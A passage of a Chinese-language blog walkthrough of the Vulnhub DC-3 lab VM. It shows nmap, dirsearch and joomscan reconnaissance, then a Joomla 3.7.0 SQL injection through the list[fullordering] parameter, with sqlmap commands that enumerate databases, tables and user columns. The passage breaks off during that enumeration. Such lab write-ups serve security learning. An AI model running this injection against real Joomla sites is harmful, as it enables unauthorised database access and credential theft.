基于Vulnhub靶场之DC-3渗透测试过程-阿里云开发者社区

基于Vulnhub靶场之DC-3渗透测试过程

2024-04-23 225

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： Vulhub靶场介绍：[Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境，帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括：1. **丰富的漏洞场景**：覆盖多种常见的漏洞，如SQL注入、XSS等。2. **详细复现指南**：为每个漏洞场景提供详细的环境搭建和利用步骤，便于学习和实践。3. **易于使用**：提供一键部署或Docker镜像，简化环境搭建过程4. **持续更新与维护**：项目在GitHub上开源，不断接收社区的贡献和更新

Vulhub靶场介绍：

Vulhub是一个专注于安全漏洞复现与学习的开源项目，它提供了一系列常见漏洞的复现环境，帮助安全从业者学习和研究漏洞利用技术。这些复现环境包括但不限于Web应用、容器、操作系统等。

Vulhub的特点包括：

丰富的漏洞场景: Vulhub涵盖了多种常见的漏洞场景，包括Web应用漏洞（如SQL注入、XSS等）、容器漏洞（如Docker安全配置）、操作系统漏洞等。
详细的漏洞复现指南: 对于每个漏洞场景，Vulhub提供了详细的漏洞复现指南，包括环境搭建、漏洞利用过程等步骤，方便用户学习和实践。
易于使用的环境搭建: Vulhub提供了一键部署或Docker镜像的方式，使用户可以快速搭建漏洞复现环境，节省了配置环境的时间。
持续更新与维护: Vulhub项目在GitHub上开源，得到了全球安全社区的贡献与反馈，保持了良好的更新与维护。

总的来说，Vulhub为安全从业者提供了一个学习漏洞利用技术的良好平台，帮助他们提升安全意识和技能。

Vulnhub靶机下载：

官网下载地址：https://download.vulnhub.com./dc/DC-3-2.zip

Vulnhub靶机环境搭建：

下载压缩包之后解压，然后使用VMware 或者Oracle打开打开即可

Vulnhub靶机DC-4渗透过程：

1）信息收集

靶机与kali网络模式均为nat模式

通过使用kali扫描工具发现靶机IP地址

Kali：192.168.94.134

DC-3：192.168.94.193

arp-scan -l

2) 端口信息探测

nmap -sS -A -n 192.168.94.193

──(root㉿Kali)-[~/Desktop]
└─# nmap -sS -A -n 192.168.94.193
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-10 19:36 CST
Nmap scan report for 192.168.94.193
Host is up (0.00052s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:3D:06:25 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.94.193
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.90 seconds

探测靶机开放了80端口，访问试试，发现存在一个joomla的cms存在。

3) 渗透测试过程

在web页面做了许多功夫，扫描出后台登录系统，但是通过注入、弱口令、等密码爆破均无用。

dirsearch -u http://192.168.94.193/ -x 404 403 502

于是在网上找了需求，找到了一个joomla的扫描器->joomscan，

joomscan -u http://192.168.94.193

使用joomscan扫描发现了joomla的版本号为：Joomla 3.7.0

尝试在kali漏洞库当中搜索版本为Joomla 3.7.0的漏洞源码攻击方式，于是给找到了漏洞存在的URL 以及构造攻击的payload

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

通过sqlmap注入，发现了以下几种库，于是通过分析得知joomladb是我们的目标，接着跑表格列，发现_user列

sqlmap -u "http://192.168.94.193/index.phpoption=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

sqlmap -u "http://192.168.94.193/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]